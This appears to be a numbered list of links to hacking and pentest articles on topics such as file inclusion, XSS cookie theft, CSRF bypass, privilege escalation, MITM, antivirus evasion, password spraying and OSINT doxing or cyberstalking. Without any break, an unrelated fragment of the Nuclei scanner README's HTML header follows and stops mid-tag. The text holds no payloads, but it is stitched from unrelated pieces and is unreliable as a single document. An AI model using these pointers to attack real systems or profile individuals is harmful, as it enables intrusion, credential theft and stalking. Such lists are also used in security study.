-1593-Conducting an IoT Pentest : https://medium.com/p/6fa573ac6668?source=user_profile... -1594-Efficient way to pentest Android Chat Applications: https://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f -1595-APT2 - Automated PenTest Toolkit : https://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href -1596-Pentest Tools and Distros: https://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d -1597-Keeping notes during a pentest/security assessment/code review: https://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b -1598-An intro to pentesting an Android phone: https://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39 -1599-The Penetration Testing Report: https://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2 -1600-VA vs Pentest: https://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03 -1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux: https://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f -1602-Pentesting Ethereum dApps: https://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19 -1603-Android pentest lab in a nutshell : https://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3 -1604-Pentest Magazine: Web Scraping with Python : https://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3 -1605-Pentesting iOS apps without jailbreak: https://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e -1606-OSCP/Pen Testing Resources: https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting): https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc -1608-Local File Inclusion (LFI) — Web Application Penetration Testing: https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 -1609-Local File Inclusion (Basic): https://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3 -1610-PHP File Inclusion Vulnerability: https://www.immuniweb.com/vulnerability/php-file-inclusion.html -1611-Local File Inclusion: https://teambi0s.gitlab.io/bi0s-wiki/web/lfi/ -1612-Web Application Penetration Testing: Local File Inclusion: https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/ -1613-From Local File Inclusion to Code Execution : https://resources.infosecinstitute.com/local-file-inclusion-code-execution/ -1614-RFI / LFI: https://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/ -1615-From Local File Inclusion to Remote Code Execution - Part 2: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2 -1616-Local File Inclusion: https://xapax.gitbooks.io/security/content/local_file_inclusion.html -1617-Beginner Guide to File Inclusion Attack (LFI/RFI) : https://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/ -1618-LFI / RFI: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en -1619-LFI and RFI Attacks - All You Need to Know: https://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/ -1620-Log Poisoning - LFI to RCE : http://liberty-shell.com/sec/2018/05/19/poisoning/ -1621-LFI: https://www.slideshare.net/cyber-punk/lfi-63050678 -1622-Hand Guide To Local File Inclusion(LFI): www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html -1623-Local File Inclusion (LFI) - Cheat Sheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ -1624-Web Application Penetration Testing Local File Inclusion (LFI): https://www.cnblogs.com/Primzahl/p/6258149.html -1625-File Inclusion Vulnerability Prevention: https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/ -1626-The Most In-depth Hacker's Guide: https://books.google.com/books?isbn=1329727681 -1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking: https://books.google.com/books?id=e6CHDwAAQBAJ -1628-Web App Hacking, Part 11: Local File Inclusion: https://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI -1629-Local and remote file inclusion : https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi -1630-Upgrade from LFI to RCE via PHP Sessions : https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ -1631-CVV #1: Local File Inclusion: https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a -1632-(PDF) Cross Site Scripting (XSS) in Action: https://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action -1633-XSS exploitation part 1: www.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html -1634-Weaponizing self-xss: https://silentbreaksecurity.com/weaponizing-self-xss/ -1635-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1636-Defense against the Black Arts: https://books.google.com/books?isbn=1439821224 -1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -1638-Bypassing CSRF protection: https://www.bugbountynotes.com/training/tutorial?id=5 -1639-Stealing CSRF tokens with XSS: https://digi.ninja/blog/xss_steal_csrf_token.php -1640-Same Origin Policy and ways to Bypass: https://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12 -1641-Bypassing Same Origin Policy : https://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/ -1642-Client-Side Attack - an overview : https://www.sciencedirect.com/topics/computer-science/client-side-attack -1643-Client-Side Injection Attacks: https://blog.alertlogic.com/blog/client-side-injection-attacks/ -1645-The Client-Side Battle Against JavaScript Attacks Is Already Here: https://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2 -1646-Why Let’s Encrypt is a really, really, really bad idea: https://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801 -1647-Huge Guide to Client-Side Attacks: https://www.notion.so/d382649cfebd4c5da202677b6cad1d40 -1648-OSCP Prep – Episode 11: Client Side Attacks: https://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/ -1649-Client side attack - AV Evasion: https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack -1650-Client-Side Attack With Metasploit (Part 4): https://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/ -1651-Ransomware: Latest Developments and How to Defend Against Them: https://www.recordedfuture.com/latest-ransomware-attacks/ -1652-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords: https://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833 -1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site: https://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d -1655-Steal victim's cookie using Cross Site Scripting (XSS) : https://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/ -1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security: https://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86 -1657-Remote Command Execution: https://hacksland.net/remote-command-execution/ -1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2 -1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit): https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/ -1660-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -1661-Exploitation: XML External Entity (XXE) Injection: https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection -1662-Hack The Box: DevOops: https://redteamtutorials.com/2018/11/11/hack-the-box-devoops/ -1663-Web Application Penetration Testing Notes: https://techvomit.net/web-application-penetration-testing-notes/ -1664-WriteUp – Aragog (HackTheBox) : https://ironhackers.es/en/writeups/writeup-aragog-hackthebox/ -1665-Linux Privilege Escalation Using PATH Variable: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -1666-Linux Privilege Escalation via Automated Script : https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/ -1667-Privilege Escalation - Linux : https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html -1668-Linux Privilege Escalation: https://percussiveelbow.github.io/linux-privesc/ -1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit : https://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/ -1670-Linux Privilege Escalation With Kernel Exploit: https://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/ -1671-Reach the root! How to gain privileges in Linux: https://hackmag.com/security/reach-the-root/ -1672-Enumeration for Linux Privilege Escalation: https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959 -1673-Linux Privilege Escalation Scripts : https://netsec.ws/?p=309 -1674-Understanding Privilege Escalation: www.admin-magazine.com/Articles/Understanding-Privilege-Escalation -1675-Toppo:1 | Vulnhub Walkthrough: https://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d -1676-Privilege Escalation resources: https://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources -1678-OSCP Notes – Privilege Escalation (Linux): https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ -1679-Udev Exploit Allows Local Privilege Escalation : www.madirish.net/370 -1680-Understanding Linux Privilege Escalation and Defending Against It: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it -1681-Windows Privilege Escalation Using PowerShell: https://hacknpentest.com/windows-privilege-escalation-using-powershell/ -1682-Privilege Escalation | Azeria Labs: https://azeria-labs.com/privilege-escalation/ -1683-Abusing SUDO (Linux Privilege Escalation): https://touhidshaikh.com/blog/?p=790 -1684-Privilege Escalation - Linux: https://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html -1685-0day Linux Escalation Privilege Exploit Collection : https://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/ -1686-Linux for Pentester: cp Privilege Escalation : https://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html -1687-Practical Privilege Escalation Using Meterpreter: https://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/ -1688-dirty_sock: Linux Privilege Escalation (via snapd): https://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/ -1689-Linux privilege escalation: https://jok3rsecurity.com/linux-privilege-escalation/ -1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks: https://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/ -1691-How to prepare for PWK/OSCP, a noob-friendly guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob -1692-Basic Linux privilege escalation by kernel exploits: https://greysec.net/showthread.php?tid=1355 -1693-Linux mount without root : epaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root -1694-Linux Privilege Escalation Oscp: www.condadorealty.com/2h442/linux-privilege-escalation-oscp.html -1695-Privilege Escalation Attack Tutorial: https://alhilalgroup.info/photography/privilege-escalation-attack-tutorial -1696-Oscp Bethany Privilege Escalation: https://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation -1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit: https://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/ -1698-Privilege Escalation - Linux · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html -1699-Linux advanced privilege escalation: https://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation -1700-Local Linux privilege escalation overview: https://myexperiments.io/linux-privilege-escalation.html -1701-Windows Privilege Escalation Scripts & Techniques : https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194 -1702-Penetration Testing: Maintaining Access: https://resources.infosecinstitute.com/penetration-testing-maintaining-access/ -1703-Kali Linux Maintaining Access : https://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm -1704-Best Open Source Tools for Maintaining Access & Tunneling: https://n0where.net/maintaining-access -1705-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -1706-Maintaining Access - Ethical hacking and penetration testing: https://miloserdov.org/?cat=143 -1707-Maintaining Access with Web Backdoors [Weevely]: https://www.yeahhub.com/maintaining-access-web-backdoors-weevely/ -1708-Best Open Source MITM Tools: Sniffing & Spoofing: https://n0where.net/mitm-tools -1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained: https://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/ -1710-Man In The Middle Attack (MITM): https://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987 -1711-Real-World Man-in-the-Middle (MITM) Attack : https://ieeexplore.ieee.org/document/8500082 -1712-The Ultimate Guide to Man in the Middle Attacks : https://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/ -1713-How to Conduct ARP Spoofing for MITM Attacks: https://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/ -1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning: https://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633 -1715-Ettercap and middle-attacks tutorial : https://pentestmag.com/ettercap-tutorial-for-windows/ -1716-How To Setup A Man In The Middle Attack Using ARP Poisoning: https://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/ -1717-Intro to Wireshark and Man in the Middle Attacks: https://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d -1718-MiTM Attack with Ettercap: https://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap -1719-Man in the Middle Attack with Websploit Framework: https://www.yeahhub.com/man-middle-attack-websploit-framework/ -1720-SSH MitM Downgrade : https://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade -1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files: https://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/ -1722-Powershell port scanner and banner grabber: https://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/ -1723-What is banner grabbing attack: https://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php -1724-Network penetration testing: https://guif.re/networkpentest -1725-NMAP Cheatsheet: https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/ -1726-How To Scan a Network With Nmap: https://online-it.nu/how-to-scan-a-network-with-nmap/ -1727-Hacking Metasploitable : Scanning and Banner grabbing: https://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/ -1728-Penetration Testing of an FTP Server: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b -1729-Nmap Usage & Cheet-Sheet: https://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/ -1730-Discovering SSH Host Keys with NMAP: https://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html -1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation: https://techincidents.com/banner-grabbing-using-nmap-netcat -1732-Nmap – (Vulnerability Discovery): https://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/ -1733-Penetration Testing on MYSQL (Port 3306): https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/ -1774-Password Spraying - Infosec Resources : https://resources.infosecinstitute.com/password-spraying/ -1775-Password Spraying- Common mistakes and how to avoid them: https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b -1776-Password Spraying Tutorial: https://attack.stealthbits.com/password-spraying-tutorial-defense -1777-password spraying Archives: https://www.blackhillsinfosec.com/tag/password-spraying/ -1778-The 21 Best Email Finding Tools:: https://beamery.com/blog/find-email-addresses -1779-OSINT Primer: People (Part 2): https://0xpatrik.com/osint-people/ -1780-Discovering Hidden Email Gateways with OSINT Techniques: https://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/ -1781-Top 20 Data Reconnaissance and Intel Gathering Tools : https://securitytrails.com/blog/top-20-intel-tools -1782-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -1783-Digging Through Someones Past Using OSINT: https://nullsweep.com/digging-through-someones-past-using-osint/ -1784-Gathering Open Source Intelligence: https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05 -1785-How to Locate the Person Behind an Email Address: https://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/ -1786-Find hacked email addresses and check breach mails: https://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/ -1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password : https://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/ -1788-Top 10 OSINT Tools/Sources for Security Folks: www.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html -1789-Top 5 Open Source OSINT Tools for a Penetration Tester: https://www.breachlock.com/top-5-open-source-osint-tools/ -1790-Open Source Intelligence tools for social media: my own list: https://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/ -1791-Red Teaming: I can see you! Insights from an InfoSec expert : https://www.perspectiverisk.com/i-can-see-you-osint/ -1792-OSINT Playbook for Recruiters: https://amazinghiring.com/osint-playbook/ -1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking: https://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking -1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques): https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a -1795-Online Investigative Tools for Social Media Discovery and Locating People: https://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html -1796-Expanding Skype Forensics with OSINT: Email Accounts: http://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/ -1798-2019 OSINT Guide: https://www.randhome.io/blog/2019/01/05/2019-osint-guide/ -1799-OSINT - Passive Recon and Discovery of Assets: https://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715 -1800-OSINT With Datasploit: https://dzone.com/articles/osint-with-datasploit -1801-Building an OSINT Reconnaissance Tool from Scratch: https://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b -1802-Find Identifying Information from a Phone Number Using OSINT Tools: https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/ -1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step): https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/ -1804-Investigative tools for finding people online and keeping yourself safe: https://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe -1805- Full text of "The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim": https://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt -1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account: https://archive.org/details/texts?and%5B%5D=hacking&sin= -1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!: https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 -1808-How to Pass OSCP Like Boss: https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d -1809-Deploy a private Burp Collaborator Server in Azure: https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70 -1810-Using Shodan Better Way! :): https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6 -1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty: https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 -1812-How we got LFI in apache Drill (Recon like a boss):: https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d -1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking: https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14 -1814-Week in OSINT #2019–19: https://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4 -1814-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -1815-Week in OSINT #2019–24: https://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f -1816-Page Admin Disclosure | Facebook Bug Bounty 2019: https://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb -1817-XSS in Edmodo within 5 Minute (My First Bug Bounty): https://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d -1818-Collection Of Bug Bounty Tip-Will Be updated daily: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.: https://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6 -1820-How I found a simple bug in Facebook without any Test: https://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2 -1821-Facebook BugBounty — Disclosing page members: https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520 -1822-Don’t underestimates the Errors They can provide good $$$ Bounty!: https://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596 -1823-Django and Web Security Headers: https://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e -1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads: https://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800 -1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program: https://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9 -1826-XSS in Microsoft subdomain: https://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631 -1827-How Angular Protects Us From XSS Attacks?: https://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95 -1828-[FUN] Bypass XSS Detection WAF: https://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e -1829-Bug Hunting Methodology(Part-2): https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150 -1830-Learn Web Application Penetration Testing: https://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361 -1831-“Exploiting a Single Parameter”: https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523 -1832-CORS To CSRF Attack: https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441 -1833-Account Takeover Using CSRF(json-based): https://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc -1834-Bypassing Anti-CSRF with Burp Suite Session Handling: https://bestestredteam.com/tag/anti-csrf/ -1835-10 Methods to Bypass Cross Site Request Forgery (CSRF): https://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/ -1836-Exploiting CSRF on JSON endpoints with Flash and redirects: https://medium.com/p/681d4ad6b31b -1837-Finding and exploiting Cross-site request forgery (CSRF): https://securityonline.info/finding-exploiting-cross-site-request-forgery/ -1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration: https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf -1839-Synchronizer Token Pattern: No more tricks: https://medium.com/p/d2af836ccf71 -1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service: https://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1 -1841-XML External Entity(XXE): https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b -1842-XXE Attacks— Part 1: XML Basics: https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26 -1843-From XXE to RCE with PHP/expect — The Missing Link: https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 -1844-My first XML External Entity (XXE) attack with .gpx file: https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98 -1845-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496 -1846-XXE on Windows system …then what ??: https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745 -1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 -1848-SVG XLink SSRF fingerprinting libraries version: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c -1849-What is XML Injection Attack: https://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6 -1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 -1851-Penetration Testing Introduction: Scanning & Reconnaissance: https://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f -1852-Beginner’s Guide to recon automation.: https://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -1853-Red Teamer’s Guide to Pulse Secure SSL VPN: https://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b -1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection: https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 -1855-How I harvested Facebook credentials via free wifi?: https://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049 -1856-How to hack any Payment Gateway?: https://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5 -1857-How I hacked into my neighbour’s WiFi and harvested login credentials?: https://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc -1858-What do Netcat, SMTP and self XSS have in common? Stored XSS: https://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002 -1859-1-Click Account Takeover in Virgool.io — a Nice Case Study: https://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2 -1860-Digging into Android Applications — Part 1 — Drozer + Burp: https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2 -1861-Linux for Pentester: APT Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation -1862-Linux for Pentester : ZIP Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation -1863-Koadic - COM Command & Control Framework: https://www.hackingarticles.in/koadic-com-command-control-framework -1864-Configure Sqlmap for WEB-GUI in Kali Linux : https://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux -1865-Penetration Testing: https://www.hackingarticles.in/Penetration-Testing -1866-Buffer Overflow Examples, Code execution by shellcode : https://0xrick.github.io/binary-exploitation/bof5 -1867-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution -1868-JSC Exploits: -https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html -1869-Injecting Into The Hunt: https://jsecurity101.com/2019/Injecting-Into-The-Hunt -1870-Bypassing Antivirus with Golang: https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it -1871-Windows Process Injection: Print Spooler: https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler -1872-Inject Shellcode Into Memory Using Unicorn : https://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn -1873-Macros and More with SharpShooter v2.0: https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0 -1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing -1875-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
<h1 align="center"> <br> <a href="https://nuclei.projectdiscovery.io"><img src="static/nuclei-logo.png" width="200px" alt="Nuclei"></a> </h1> <h4 align="center">Fast and customisable vulnerability scanner based on simple YAML based DSL.</h4> <p align="center"> <a href="https://goreportcard.com/report/github.com/projectdiscovery/nuclei"><img src="https://goreportcard.com/badge/github.com/projectdiscovery/nuclei"></a> <a href="https://github.com/projectdiscovery/nuclei/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a> <a href="https://github.com/projectdiscovery/nuclei/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei"></a> <a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> <a href="https://github.com/projectdiscovery/nuclei/actions/workflows/build-test.yml"><img src="https://github.com/projectdiscovery/nuclei/actions/workflows/build-test.yml/badge.svg?branch=master"></a> </p> <p align="center"> <a href="#how-it-works">How</a> • <a 